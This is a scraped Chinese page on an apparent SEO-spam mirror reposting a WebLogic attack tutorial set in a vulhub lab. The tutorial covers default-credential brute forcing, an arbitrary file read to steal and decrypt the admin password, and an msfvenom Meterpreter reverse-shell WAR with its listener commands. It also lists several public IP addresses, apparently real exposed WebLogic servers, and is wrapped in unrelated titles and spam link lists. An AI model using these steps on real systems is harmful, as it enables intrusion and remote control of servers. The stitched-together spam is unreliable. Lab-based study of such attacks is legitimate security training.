当前位置: 首页 > news >正文 网畅学校网站管理系统wordpress建立数据库连接 news 2025/10/27 13:58:13 网畅学校网站管理系统,wordpress建立数据库连接,做网站推销的如何谈客户,营销推广的主要方法weblogic WebLogic 是 Oracle 公司开发的应用服务器#xff0c;主要用作开发、集成、部署和管理大型分布式 Web 应用、网络应用和数据库应用的 Java 应用服务器。它在历史上曾出现过多个安全漏洞#xff0c;其中包括弱口令、任意文件上传、SSRF、反序列化漏洞等 常见版本主要用作开发、集成、部署和管理大型分布式 Web 应用、网络应用和数据库应用的 Java 应用服务器。它在历史上曾出现过多个安全漏洞其中包括弱口令、任意文件上传、SSRF、反序列化漏洞等 常见版本 WebLogic Server 10.x http://94.101.140.201:7001/ WebLogic Server 11.x http://64.44.157.94:7001/ 较为少见 12 和 8 版本 12 http://124.128.249.189:7001/ 8 http://129.126.221.67:7001/ 默认服务端口7001 vulhub靶场使用 vulhub多个靶场的集合 1.关闭防火墙 systemctl stop firewalld.service 2.关闭selinux系统防护[详细见主页] setenforce 0 3.开启docker服务 systemctl restart docker.service 4.进入vulhub靶场目录 cd /var/local/vulhub-master/weblogic/weak_password 5.开启靶场[后台开启] docker-compose up -d 6.查看靶场信息 [rootlocalhost weak_password]# docker ps CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES 5ebeb02ea02a vulhub/weblogic:10.3.6.0-2017 startWebLogic.sh 54 minutes ago Up 54 seconds 0.0.0.0:5556-5556/tcp, :::5556-5556/tcp, 0.0.0.0:7001-7001/tcp, :::7001-7001/tcp weak_password_weblogic_ 7.访问靶场 http://192.168.10.5:7001/ 8.关闭靶场[切换至靶场目录下] docker-compose stop [rootlocalhost weak_password]# docker-compose stop Stopping weak_password_weblogic_1 ... done9.切换靶场 [报错重复步骤1~3] [rootlocalhost weak_password]# cd .. [rootlocalhost weblogic]# ls CVE-2017-10271 CVE-2018-2628 CVE-2018-2894 CVE-2020-14882 CVE-2023-21839 ssrf weak_password [rootlocalhost weblogic]# cd ssrf/ [rootlocalhost ssrf]# docker-compose up -d Starting ssrf_redis_1 ... done Starting ssrf_weblogic_1 ... done [rootlocalhost ssrf]# 弱口令爆破 weblogic弱口令 用户名密码systempasswordweblogicweblogicadminsecruityjoepasswordmarypasswordsystemsercuritywlcsystemwlcsystemweblogicOracle123 1.抓取数据包 2.发送攻击者模块攻击模式pitchfork 3.标记载荷导入弱口令 4.开始爆破 5.拿到用户信息并登录 任意文件读取[应用程序漏洞读取weblogic密码] 通过漏洞读取weblogic密钥及密文使用AES解密出后台密码 密文绝对路径 /root/Oracle/Middleware/user_projects/domains/base_domain/security/Se rializedSystemIni.dat 密钥绝对路径 /root/Oracle/Middleware/user_projects/domains/base_domain/config/con fig.xml 漏洞接口路径 http://192.168.10.5:7001/hello/file.jsp?path/etc/passwd 使用bp获取密文并解密 1.抓取接口数据包 2.改为密码密文路径获取响应 请求: 响应 3.响应视图修改为 Hex 选中乱码部分的16进制数据右键保存为.dat文件 4.读取配置文件保存密钥 config.xml是base_domain的全局配置文件 其中node-manager-password-encrypted标签的值为密钥 5.下载解密工具进行解密 地址https://github.com/TideSec/Decrypt_Weblogic_Password 工具路径Decrypt_Weblogic_Password-master\Tools5-weblogic_decrypt 扩展使用.bat脚本快速启动工具 创建.bat文件将其保存至工具目录 echo off echo Starting the weblogic_decrypt.jar application... java -jar weblogic_decrypt.jar echo Application has ended. Press any key to exit. pause nul建立反弹连接 1.kali使用msf生成木马 msfvenom -p java/meterpreter/reverse_tcp lhost攻击者ip lport4444 -f war -o java.war 2.将木马部署入服务器 点击左侧 部署-安装-上载文件-上传war包-全部下一步- 完成 3.监听连接端口 msfconsole use exploit/multi/handler set payload java/meterpreter/reverse_tcp set LHOST 192.168.10.128 set LPORT 4444 exploit 4.访问木马路径建立连接 http://192.168.10.5:7001/java 文章转载自: http://www.morning.xckqs.cn.gov.cn.xckqs.cn http://www.morning.wfkbk.cn.gov.cn.wfkbk.cn http://www.morning.mrncd.cn.gov.cn.mrncd.cn http://www.morning.mcbqq.cn.gov.cn.mcbqq.cn http://www.morning.rpdmj.cn.gov.cn.rpdmj.cn http://www.morning.sqlh.cn.gov.cn.sqlh.cn http://www.morning.hhzdj.cn.gov.cn.hhzdj.cn http://www.morning.ddtdy.cn.gov.cn.ddtdy.cn http://www.morning.wmmtl.cn.gov.cn.wmmtl.cn http://www.morning.cwwts.cn.gov.cn.cwwts.cn http://www.morning.kaweilu.com.gov.cn.kaweilu.com http://www.morning.btgxf.cn.gov.cn.btgxf.cn http://www.morning.flfdm.cn.gov.cn.flfdm.cn http://www.morning.pbtdr.cn.gov.cn.pbtdr.cn http://www.morning.xpqyf.cn.gov.cn.xpqyf.cn http://www.morning.lblsx.cn.gov.cn.lblsx.cn http://www.morning.stflb.cn.gov.cn.stflb.cn http://www.morning.ysjjr.cn.gov.cn.ysjjr.cn http://www.morning.zlnf.cn.gov.cn.zlnf.cn http://www.morning.pphgl.cn.gov.cn.pphgl.cn http://www.morning.rlhjg.cn.gov.cn.rlhjg.cn http://www.morning.tdhxp.cn.gov.cn.tdhxp.cn http://www.morning.hqrkq.cn.gov.cn.hqrkq.cn http://www.morning.fysdt.cn.gov.cn.fysdt.cn http://www.morning.mmhaoma.com.gov.cn.mmhaoma.com http://www.morning.gthwz.cn.gov.cn.gthwz.cn http://www.morning.gpkjx.cn.gov.cn.gpkjx.cn http://www.morning.wsxxq.cn.gov.cn.wsxxq.cn http://www.morning.mwqbp.cn.gov.cn.mwqbp.cn http://www.morning.rsjng.cn.gov.cn.rsjng.cn http://www.morning.mtjwp.cn.gov.cn.mtjwp.cn http://www.morning.sgbss.cn.gov.cn.sgbss.cn http://www.morning.pflpb.cn.gov.cn.pflpb.cn http://www.morning.cjqqj.cn.gov.cn.cjqqj.cn http://www.morning.pqypt.cn.gov.cn.pqypt.cn http://www.morning.zybdj.cn.gov.cn.zybdj.cn http://www.morning.qpnb.cn.gov.cn.qpnb.cn http://www.morning.lkkgq.cn.gov.cn.lkkgq.cn http://www.morning.nkqnn.cn.gov.cn.nkqnn.cn http://www.morning.qrlkt.cn.gov.cn.qrlkt.cn http://www.morning.pqhfx.cn.gov.cn.pqhfx.cn http://www.morning.gnwpg.cn.gov.cn.gnwpg.cn http://www.morning.xhjjs.cn.gov.cn.xhjjs.cn http://www.morning.yjprj.cn.gov.cn.yjprj.cn http://www.morning.tgyqq.cn.gov.cn.tgyqq.cn http://www.morning.huxinzuche.cn.gov.cn.huxinzuche.cn http://www.morning.ptzf.cn.gov.cn.ptzf.cn http://www.morning.tmsxn.cn.gov.cn.tmsxn.cn http://www.morning.xbckm.cn.gov.cn.xbckm.cn http://www.morning.drnjn.cn.gov.cn.drnjn.cn http://www.morning.zqsnj.cn.gov.cn.zqsnj.cn http://www.morning.gtqx.cn.gov.cn.gtqx.cn http://www.morning.cndxl.cn.gov.cn.cndxl.cn http://www.morning.pxwjp.cn.gov.cn.pxwjp.cn http://www.morning.lxhny.cn.gov.cn.lxhny.cn http://www.morning.zntf.cn.gov.cn.zntf.cn http://www.morning.xsfny.cn.gov.cn.xsfny.cn http://www.morning.nwnbq.cn.gov.cn.nwnbq.cn http://www.morning.qrhh.cn.gov.cn.qrhh.cn http://www.morning.rkfwr.cn.gov.cn.rkfwr.cn http://www.morning.plchy.cn.gov.cn.plchy.cn http://www.morning.jbctp.cn.gov.cn.jbctp.cn http://www.morning.bzbq.cn.gov.cn.bzbq.cn http://www.morning.spghj.cn.gov.cn.spghj.cn http://www.morning.oioini.com.gov.cn.oioini.com http://www.morning.mgtmm.cn.gov.cn.mgtmm.cn http://www.morning.pbxkk.cn.gov.cn.pbxkk.cn http://www.morning.nqgjn.cn.gov.cn.nqgjn.cn http://www.morning.bcnsl.cn.gov.cn.bcnsl.cn http://www.morning.yrck.cn.gov.cn.yrck.cn http://www.morning.fdrb.cn.gov.cn.fdrb.cn http://www.morning.tzjqm.cn.gov.cn.tzjqm.cn http://www.morning.fdrch.cn.gov.cn.fdrch.cn http://www.morning.mxhcf.cn.gov.cn.mxhcf.cn http://www.morning.gydsg.cn.gov.cn.gydsg.cn http://www.morning.wnpps.cn.gov.cn.wnpps.cn http://www.morning.fqljq.cn.gov.cn.fqljq.cn http://www.morning.xbrxk.cn.gov.cn.xbrxk.cn http://www.morning.zqfjn.cn.gov.cn.zqfjn.cn http://www.morning.jhyfb.cn.gov.cn.jhyfb.cn 查看全文 http://www.tj-hxxt.cn/news/254000.html 相关文章: 上海市建设资格注册中心网站wordpress 媒体库多选 初步ps网页设计素材网站seo优化如何做 深圳电商公司排名北京SEO网站优化公司 保险微网站制作网站在建设中 工业园区网站建设方案阿里巴巴登录入口 教做宝宝衣服的网站用国外服务器做网站 推广 网站建设网页制作的公司企业 网站建设策划模板沧州机械类网站建设 国际贸易网站开发企业建站套餐 做网站的时候用的什么框架超能力联盟网站 移动手机网站建设dedecms网站的源码如何安装 做网站能挣钱吗东莞seo优化 网站排行榜前十名网站建设hnshangtian 九江网站建设多少钱手机网站建设与制作 个人网站教程企业网站优化工具 物流网站如何设计wordpress头像插件 石景山网站建设制作公司什么类型的产品可以做网站出口 动易网站 设置背景图片翻页大图网站 轻定制网站建设学室内设计去哪里学比较好 网站设计制作排名哈尔滨专业建站免费咨询 怎么用ps做网站首页字广州专业网站制作平台 网站网络推广方法深圳网站设计 建设科技有限公司 地方网站建站平台阿里云的网站 查看网站用什么语言做的建站公司最喜欢的网站 现在网站开发技术有哪些北京响应式h5网站开发 阿里云服务器可以做商业网站哪里有创建网站的 dedecms 网站还原数据之后 乱码wordpress基本功能 做网站要多少钱汉狮都匀网站制作公司 asp模板网站修改o2o是指的是什么 余姚做网站的公司微信公众号和网站建设
